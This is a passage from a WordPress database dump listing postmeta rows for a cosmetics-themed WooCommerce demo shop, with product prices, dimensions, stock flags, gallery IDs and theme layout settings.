'_sale_price_dates_to',''),(7251,1097,'total_sales','0'),(7252,1097,'_tax_status','taxable'),(7253,1097,'_tax_class',''),(7254,1097,'_manage_stock','no'),(7255,1097,'_backorders','no'),(7256,1097,'_sold_individually','no'),(7257,1097,'_weight','0.3'),(7258,1097,'_length','20'),(7259,1097,'_width','30'),(7260,1097,'_height','70'),(7261,1097,'_upsell_ids','a:0:{}'),(7262,1097,'_crosssell_ids','a:0:{}'),(7263,1097,'_purchase_note',''),(7264,1097,'_default_attributes','a:0:{}'),(7265,1097,'_virtual','no'),(7266,1097,'_downloadable','no'),(7267,1097,'_product_image_gallery','1128,1129,1130'),(7268,1097,'_download_limit','-1'),(7269,1097,'_download_expiry','-1'),(7270,1097,'_stock',''),(7271,1097,'_stock_status','instock'),(7272,1097,'_wc_average_rating','0'),(7274,1097,'_wc_review_count','0'),(7275,1097,'_downloadable_files','a:0:{}'),(7276,1097,'_product_attributes','a:0:{}'),(7277,1097,'_product_version','4.0.4'),(7278,1097,'_price','86'),(7279,1097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7280,1097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7281,1097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7282,1097,'qodef_show_new_sign_woo_meta','no'),(7283,1097,'slide_template',''),(7284,1097,'_wpb_vc_js_status','true'),(7285,1097,'_thumbnail_id','2476'),(7286,1099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7287,1099,'_sku','06'),(7288,1099,'_regular_price','92'),(7289,1099,'_sale_price',''),(7290,1099,'_sale_price_dates_from',''),(7291,1099,'_sale_price_dates_to',''),(7292,1099,'total_sales','0'),(7293,1099,'_tax_status','taxable'),(7294,1099,'_tax_class',''),(7295,1099,'_manage_stock','no'),(7296,1099,'_backorders','no'),(7297,1099,'_sold_individually','no'),(7298,1099,'_weight','0.3'),(7299,1099,'_length','20'),(7300,1099,'_width','30'),(7301,1099,'_height','70'),(7302,1099,'_upsell_ids','a:0:{}'),(7303,1099,'_crosssell_ids','a:0:{}'),(7304,1099,'_purchase_note',''),(7305,1099,'_default_attributes','a:0:{}'),(7306,1099,'_virtual','no'),(7307,1099,'_downloadable','no'),(7308,1099,'_product_image_gallery','1151,1152,1153'),(7309,1099,'_download_limit','-1'),(7310,1099,'_download_expiry','-1'),(7311,1099,'_stock',''),(7312,1099,'_stock_status','instock'),(7313,1099,'_wc_average_rating','0'),(14213,5435,'qodef_audio_type_meta','social_networks'),(7315,1099,'_wc_review_count','0'),(7316,1099,'_downloadable_files','a:0:{}'),(7317,1099,'_product_attributes','a:0:{}'),(7318,1099,'_product_version','4.0.4'),(7319,1099,'_price','92'),(7320,1099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7321,1099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7322,1099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7323,1099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7324,1099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7325,1099,'qodef_show_new_sign_woo_meta','no'),(7326,1099,'slide_template',''),(7327,1099,'_wpb_vc_js_status','true'),(7328,1099,'_thumbnail_id','2168'),(7329,1100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7330,1100,'_sku','07'),(7331,1100,'_regular_price','101'),(7332,1100,'_sale_price',''),(7333,1100,'_sale_price_dates_from',''),(7334,1100,'_sale_price_dates_to',''),(7335,1100,'total_sales','0'),(7336,1100,'_tax_status','taxable'),(7337,1100,'_tax_class',''),(7338,1100,'_manage_stock','no'),(7339,1100,'_backorders','no'),(7340,1100,'_sold_individually','no'),(7341,1100,'_weight','0.3'),(7342,1100,'_length','20'),(7343,1100,'_width','30'),(7344,1100,'_height','70'),(7345,1100,'_upsell_ids','a:0:{}'),(7346,1100,'_crosssell_ids','a:0:{}'),(7347,1100,'_purchase_note',''),(7348,1100,'_default_attributes','a:0:{}'),(7349,1100,'_virtual','no'),(7350,1100,'_downloadable','no'),(7351,1100,'_product_image_gallery','1156,1157,1158'),(7352,1100,'_download_limit','-1'),(7353,1100,'_download_expiry','-1'),(7354,1100,'_stock',''),(7355,1100,'_stock_status','instock'),(7356,1100,'_wc_average_rating','0'),(14214,5435,'qodef_post_skin','qodef-post-light-skin'),(7358,1100,'_wc_review_count','0'),(7359,1100,'_downloadable_files','a:0:{}'),(7360,1100,'_product_attributes','a:0:{}'),(7361,1100,'_product_version','4.0.4'),(7362,1100,'_price','101'),(7363,1100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7364,1100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7365,1100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7366,1100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7367,1100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7368,1100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7369,1100,'qodef_show_new_sign_woo_meta','no'),(7370,1100,'slide_template','default'),(7371,1100,'_wpb_vc_js_status','true'),(7372,1100,'_thumbnail_id','2169'),(7373,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7374,1108,'_sku','14'),(7375,1108,'_regular_price','80'),(7376,1108,'_sale_price',''),(7377,1108,'_sale_price_dates_from',''),(7378,1108,'_sale_price_dates_to',''),(7379,1108,'total_sales','0'),(7380,1108,'_tax_status','taxable'),(7381,1108,'_tax_class',''),(7382,1108,'_manage_stock','no'),(7383,1108,'_backorders','no'),(7384,1108,'_sold_individually','no'),(7385,1108,'_weight','0.3'),(7386,1108,'_length','20'),(7387,1108,'_width','30'),(7388,1108,'_height','70'),(7389,1108,'_upsell_ids','a:0:{}'),(7390,1108,'_crosssell_ids','a:0:{}'),(7391,1108,'_purchase_note',''),(7392,1108,'_default_attributes','a:0:{}'),(7393,1108,'_virtual','no'),(7394,1108,'_downloadable','no'),(7395,1108,'_product_image_gallery','1295,1297,1296'),(7396,1108,'_download_limit','-1'),(7397,1108,'_download_expiry','-1'),(7398,1108,'_stock',''),(7399,1108,'_stock_status','instock'),(7400,1108,'_wc_average_rating','0'),(14212,5435,'qodef_video_type_meta','social_networks'),(7402,1108,'_wc_review_count','0'),(7403,1108,'_downloadable_files','a:0:{}'),(7404,1108,'_product_attributes','a:0:{}'),(7405,1108,'_product_version','4.0.4'),(7406,1108,'_price','80'),(7407,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7408,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7409,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7410,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7411,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7412,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7413,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7414,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7415,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7416,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7417,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7418,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7419,1108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7420,1108,'qodef_show_new_sign_woo_meta','no'),(7421,1108,'slide_template',''),(7422,1108,'_wpb_vc_js_status','true'),(7423,1108,'_wp_old_slug','aero-aromathic-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy'),(7424,1108,'_wp_old_slug','moist-cream'),(7425,1108,'_thumbnail_id','2477'),(7426,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7427,1109,'_sku','15'),(7428,1109,'_regular_price','93'),(7429,1109,'_sale_price',''),(7430,1109,'_sale_price_dates_from',''),(7431,1109,'_sale_price_dates_to',''),(7432,1109,'total_sales','0'),(7433,1109,'_tax_status','taxable'),(7434,1109,'_tax_class',''),(7435,1109,'_manage_stock','no'),(7436,1109,'_backorders','no'),(7437,1109,'_sold_individually','no'),(7438,1109,'_weight','0.3'),(7439,1109,'_length','20'),(7440,1109,'_width','30'),(7441,1109,'_height','70'),(7442,1109,'_upsell_ids','a:0:{}'),(7443,1109,'_crosssell_ids','a:0:{}'),(7444,1109,'_purchase_note',''),(7445,1109,'_default_attributes','a:0:{}'),(7446,1109,'_virtual','no'),(7447,1109,'_downloadable','no'),(7448,1109,'_product_image_gallery','1299,1300,1301'),(7449,1109,'_download_limit','-1'),(7450,1109,'_download_expiry','-1'),(7451,1109,'_stock',''),(7452,1109,'_stock_status','instock'),(7453,1109,'_wc_average_rating','0'),(7455,1109,'_wc_review_count','0'),(7456,1109,'_downloadable_files','a:0:{}'),(7457,1109,'_product_attributes','a:0:{}'),(7458,1109,'_product_version','4.0.4'),(7459,1109,'_price','93'),(7460,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7461,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7462,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7463,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7464,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7465,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7466,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7467,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7468,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7469,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7470,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7471,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7472,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7473,1109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7474,1109,'qodef_show_new_sign_woo_meta','no'),(7475,1109,'slide_template',''),(7476,1109,'_wpb_vc_js_status','true'),(7477,1109,'_wp_old_slug','aero-aromathic-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy'),(7478,1109,'_wp_old_slug','new-care'),(7479,1109,'_thumbnail_id','2478'),(7482,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7483,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7484,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7485,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7486,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7487,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7488,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7489,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7490,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7491,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7492,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7493,2290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7494,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7495,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7496,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7497,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7498,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7499,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7500,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7501,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7502,2290,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(7503,2290,'_thumbnail_id','2135'),(7504,2290,'slide_template','default'),(7505,2290,'_wpb_vc_js_status','true'),(7506,2290,'qodef_page_content_behind_header_meta','no'),(7507,2290,'qodef_boxed_background_image_attachment_meta','fixed'),(7508,2290,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(7509,2290,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(7510,2290,'qodef_video_type_meta','social_networks'),(7511,2290,'qodef_audio_type_meta','social_networks'),(7512,2290,'qodef_post_skin','qodef-post-light-skin'),(7513,2290,'qodef_disable_vertical_header_background_image_meta','no'),(7514,2290,'qodef_disable_header_widget_logo_area_meta','no'),(7515,2290,'qodef_disable_header_widget_menu_area_meta','no'),(7516,2290,'qodef_title_area_height_meta','140'),(7517,2290,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(7518,2290,'qodef_title_area_title_tag_meta','h2'),(7519,2290,'qodef_title_text_color_meta','#3c3c3c'),(7520,2290,'qodef_title_area_background_image_behavior_meta','parallax'),(7521,2290,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(7522,2290,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans'),(7523,2290,'_wp_old_slug','substitute-for-milk-is-inevitable-for-vegans-2'),(7524,2290,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions'),(7525,2290,'_wp_old_slug','organic-vegan-cosmetic-make-up-products'),(7526,2290,'_wp_old_slug','perfect-organic-vegan-make-up-products'),(7527,2290,'_wp_old_slug','veggie-recepies-for-fast-breakfast-solutions-2'),(7528,2290,'_wp_old_slug','organic-vegan-cosmetics-and-make-up'),(7529,2290,'_wp_old_slug','figs-smoothies'),(7530,2290,'_dp_original','2132'),(7531,2290,'_wp_old_slug','veggie-dinner'),(7532,2290,'_wp_old_slug','veggie-dinner-2'),(7533,2290,'_wp_old_slug','lorem-ipsum-dolor-sit-amet-et-offendit-quaestio-his-tantas-labores-offendit-et-pro-ex-sed-nullam-meliore-ullamcorper'),(7534,2290,'qodef_page_content_top_padding','40'),(7535,2290,'qodef_page_content_top_padding_mobile','yes'),(7536,93,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7537,93,'qodef_testimonial_text','Hendrerit sententiae autem modus lorem ipsum dolor sit amet, offendit disputationi ex vim, in ius consulatu, postulant mei ut In cum corrumpit '),(7538,93,'qodef_testimonial_author','MARINE WILLIAMS'),(7539,93,'slide_template','default'),(7540,93,'_thumbnail_id','2448'),(7541,378,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(7542,378,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7543,378,'qodef_page_content_behind_header_meta','no'),(7544,378,'qodef_boxed_background_image_attachment_meta','fixed'),(7545,378,'qodef_disable_vertical_header_background_image_meta','no'),(7546,378,'qodef_disable_header_widget_logo_area_meta','no'),(7547,378,'qodef_disable_header_widget_menu_area_meta','no'),(7548,378,'slide_template','default'),(7549,378,'_wpb_vc_js_status','true'),(7550,378,'qodef_show_title_area_meta','yes'),(7551,378,'_wp_old_slug','378'),(7552,378,'qodef_page_content_top_padding','86'),(7553,378,'qodef_page_content_top_padding_mobile','yes'),(7554,378,'qodef_team_member_birth_date','October 20, 1992'),(7555,378,'qodef_team_member_email','support@select-themes.com'),(7556,378,'qodef_team_member_phone','+1235 4567 5668'),(7557,378,'qodef_team_member_address','New York'),(7558,378,'qodef_team_member_education','New York University'),(7559,378,'qodef_team_member_social_icon_pack_1','font_awesome'),(7560,378,'qodef_team_member_social_icon_pack_1_fa_icon','fa-tumblr'),(7561,378,'qodef_team_member_social_icon_1_link','https://www.tumblr.com'),(7562,378,'qodef_team_member_social_icon_1_target','_blank'),(7563,378,'qodef_team_member_social_icon_pack_2','font_awesome'),(7564,378,'qodef_team_member_social_icon_pack_2_fa_icon','fa-pinterest'),(7565,378,'qodef_team_member_social_icon_2_link','https://www.pinterest.com'),(7566,378,'qodef_team_member_social_icon_2_target','_blank'),(7567,378,'qodef_team_member_social_icon_pack_3','font_awesome'),(7568,378,'qodef_team_member_social_icon_pack_3_fa_icon','fa-facebook'),(7569,378,'qodef_team_member_social_icon_3_link','https://www.facebook.com'),(7570,378,'qodef_team_member_social_icon_3_target','_blank'),(7571,378,'qodef_team_member_social_icon_pack_4','font_awesome'),(7572,378,'qodef_team_member_social_icon_pack_4_fa_icon','fa-instagram'),(7573,378,'qodef_team_member_social_icon_4_link','https://www.instagram.com'),(7574,378,'qodef_team_member_social_icon_4_target','_blank'),(7575,378,'qodef_set_menu_area_position_meta','center'),(7576,378,'qodef_title_area_height_meta','140'),(7577,378,'qodef_team_member_position','Assistant'),(7578,378,'qodef_title_area_title_tag_meta','h3'),(7579,378,'qodef_sidebar_layout_meta','sidebar-33-right'),(7580,378,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(7581,378,'_thumbnail_id','2747'),(7582,1098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7583,1098,'_sku','05'),(7584,1098,'_regular_price','110'),(7585,1098,'_sale_price',''),(7586,1098,'_sale_price_dates_from',''),(7587,1098,'_sale_price_dates_to',''),(7588,1098,'total_sales','0'),(7589,1098,'_tax_status','taxable'),(7590,1098,'_tax_class',''),(7591,1098,'_manage_stock','no'),(7592,1098,'_backorders','no'),(7593,1098,'_sold_individually','no'),(7594,1098,'_weight','0.3'),(7595,1098,'_length','20'),(7596,1098,'_width','30'),(7597,1098,'_height','70'),(7598,1098,'_upsell_ids','a:0:{}'),(7599,1098,'_crosssell_ids','a:0:{}'),(7600,1098,'_purchase_note',''),(7601,1098,'_default_attributes','a:0:{}'),(7602,1098,'_virtual','no'),(7603,1098,'_downloadable','no'),(7604,1098,'_product_image_gallery','2484,2485,2486'),(7605,1098,'_download_limit','-1'),(7606,1098,'_download_expiry','-1'),(7607,1098,'_stock',''),(7608,1098,'_stock_status','instock'),(7609,1098,'_wc_average_rating','0'),(14219,5435,'rs_page_bg_color','#ffffff'),(7611,1098,'_wc_review_count','0'),(7612,1098,'_downloadable_files','a:0:{}'),(7613,1098,'_product_attributes','a:0:{}'),(7614,1098,'_product_version','4.0.4'),(7615,1098,'_price','110'),(7616,1098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7617,1098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7618,1098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7619,1098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7620,1098,'qodef_show_new_sign_woo_meta','no'),(7621,1098,'slide_template',''),(7622,1098,'_wpb_vc_js_status','true'),(7623,1098,'_wp_old_slug','clear-eyes'),(7624,1098,'_thumbnail_id','2483'),(7625,1102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7626,1102,'_sku','08'),(7627,1102,'_regular_price','116'),(7628,1102,'_sale_price',''),(7629,1102,'_sale_price_dates_from',''),(7630,1102,'_sale_price_dates_to',''),(7631,1102,'total_sales','0'),(7632,1102,'_tax_status','taxable'),(7633,1102,'_tax_class',''),(7634,1102,'_manage_stock','no'),(7635,1102,'_backorders','no'),(7636,1102,'_sold_individually','no'),(7637,1102,'_weight','0.3'),(7638,1102,'_length','20'),(7639,1102,'_width','30'),(7640,1102,'_height','70'),(7641,1102,'_upsell_ids','a:0:{}'),(7642,1102,'_crosssell_ids','a:0:{}'),(7643,1102,'_purchase_note',''),(7644,1102,'_default_attributes','a:0:{}'),(7645,1102,'_virtual','no'),(7646,1102,'_downloadable','no'),(7647,1102,'_product_image_gallery','1162,1163,1164'),(7648,1102,'_download_limit','-1'),(7649,1102,'_download_expiry','-1'),(7650,1102,'_stock',''),(7651,1102,'_stock_status','instock'),(7652,1102,'_wc_average_rating','0'),(14215,5435,'qodef_disable_vertical_header_background_image_meta','no'),(7654,1102,'_wc_review_count','0'),(7655,1102,'_downloadable_files','a:0:{}'),(7656,1102,'_product_attributes','a:0:{}'),(7657,1102,'_product_version','4.0.4'),(7658,1102,'_price','116'),(7659,1102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7660,1102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7661,1102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7662,1102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7663,1102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7664,1102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7665,1102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7666,1102,'qodef_show_new_sign_woo_meta','no'),(7667,1102,'slide_template',''),(7668,1102,'_wpb_vc_js_status','true'),(7669,1102,'_wp_old_slug','green-rosemary'),(7670,1102,'_thumbnail_id','2170'),(7671,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7672,1103,'_sku','09'),(7673,1103,'_regular_price','95'),(7674,1103,'_sale_price',''),(7675,1103,'_sale_price_dates_from',''),(7676,1103,'_sale_price_dates_to',''),(7677,1103,'total_sales','0'),(7678,1103,'_tax_status','taxable'),(7679,1103,'_tax_class',''),(7680,1103,'_manage_stock','no'),(7681,1103,'_backorders','no'),(7682,1103,'_sold_individually','no'),(7683,1103,'_weight','0.3'),(7684,1103,'_length','20'),(7685,1103,'_width','30'),(7686,1103,'_height','70'),(7687,1103,'_upsell_ids','a:0:{}'),(7688,1103,'_crosssell_ids','a:0:{}'),(7689,1103,'_purchase_note',''),(7690,1103,'_default_attributes','a:0:{}'),(7691,1103,'_virtual','no'),(7692,1103,'_downloadable','no'),(7693,1103,'_product_image_gallery','1171,1172,1173'),(7694,1103,'_download_limit','-1'),(7695,1103,'_download_expiry','-1'),(7696,1103,'_stock',''),(7697,1103,'_stock_status','instock'),(7698,1103,'_wc_average_rating','0'),(7700,1103,'_wc_review_count','0'),(7701,1103,'_downloadable_files','a:0:{}'),(7702,1103,'_product_attributes','a:0:{}'),(7703,1103,'_product_version','4.0.4'),(7704,1103,'_price','95'),(7705,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7706,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7707,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7708,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7709,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7710,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7711,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7712,1103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7713,1103,'qodef_show_new_sign_woo_meta','no'),(7714,1103,'slide_template',''),(7715,1103,'_wpb_vc_js_status','true'),(7716,1103,'_wp_old_slug','great-leaves'),(7717,1103,'_thumbnail_id','2171'),(7718,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7719,1104,'_sku','10'),(7720,1104,'_regular_price','99'),(7721,1104,'_sale_price',''),(7722,1104,'_sale_price_dates_from',''),(7723,1104,'_sale_price_dates_to',''),(7724,1104,'total_sales','0'),(7725,1104,'_tax_status','taxable'),(7726,1104,'_tax_class',''),(7727,1104,'_manage_stock','no'),(7728,1104,'_backorders','no'),(7729,1104,'_sold_individually','no'),(7730,1104,'_weight','0.3'),(7731,1104,'_length','20'),(7732,1104,'_width','30'),(7733,1104,'_height','70'),(7734,1104,'_upsell_ids','a:0:{}'),(7735,1104,'_crosssell_ids','a:0:{}'),(7736,1104,'_purchase_note',''),(7737,1104,'_default_attributes','a:0:{}'),(7738,1104,'_virtual','no'),(7739,1104,'_downloadable','no'),(7740,1104,'_product_image_gallery','1177,1178,1179'),(7741,1104,'_download_limit','-1'),(7742,1104,'_download_expiry','-1'),(7743,1104,'_stock',''),(7744,1104,'_stock_status','instock'),(7745,1104,'_wc_average_rating','0'),(14216,5435,'qodef_disable_header_widget_logo_area_meta','no'),(7747,1104,'_wc_review_count','0'),(7748,1104,'_downloadable_files','a:0:{}'),(7749,1104,'_product_attributes','a:0:{}'),(7750,1104,'_product_version','4.0.4'),(7751,1104,'_price','99'),(7752,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7753,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7754,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7755,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7756,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7757,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7758,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7759,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7760,1104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7761,1104,'qodef_show_new_sign_woo_meta','no'),(7762,1104,'slide_template',''),(7763,1104,'_wpb_vc_js_status','true'),(7764,1104,'_wp_old_slug','instant-figs'),(7765,1104,'_wp_old_slug','ilford-flowers'),(7766,1104,'_thumbnail_id','2173'),(7767,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7768,1105,'_sku','11'),(7769,1105,'_regular_price','67'),(7770,1105,'_sale_price',''),(7771,1105,'_sale_price_dates_from',''),(7772,1105,'_sale_price_dates_to',''),(7773,1105,'total_sales','0'),(7774,1105,'_tax_status','taxable'),(7775,1105,'_tax_class',''),(7776,1105,'_manage_stock','no'),(7777,1105,'_backorders','no'),(7778,1105,'_sold_individually','no'),(7779,1105,'_weight','0.3'),(7780,1105,'_length','20'),(7781,1105,'_width','30'),(7782,1105,'_height','70'),(7783,1105,'_upsell_ids','a:0:{}'),(7784,1105,'_crosssell_ids','a:0:{}'),(7785,1105,'_purchase_note',''),(7786,1105,'_default_attributes','a:0:{}'),(7787,1105,'_virtual','no'),(7788,1105,'_downloadable','no'),(7789,1105,'_product_image_gallery','1183,1184,1182'),(7790,1105,'_download_limit','-1'),(7791,1105,'_download_expiry','-1'),(7792,1105,'_stock',''),(7793,1105,'_stock_status','instock'),(7794,1105,'_wc_average_rating','0'),(7796,1105,'_wc_review_count','0'),(7797,1105,'_downloadable_files','a:0:{}'),(7798,1105,'_product_attributes','a:0:{}'),(7799,1105,'_product_version','4.0.4'),(7800,1105,'_price','67'),(7801,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7802,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7803,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7804,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7805,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7806,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7807,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7808,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7809,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7810,1105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7811,1105,'qodef_show_new_sign_woo_meta','no'),(7812,1105,'slide_template','default'),(7813,1105,'_wpb_vc_js_status','true'),(7814,1105,'_wp_old_slug','jingle-cinnamon'),(7815,1105,'_wp_old_slug','instant-figs'),(7816,1105,'_thumbnail_id','2175'),(7817,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid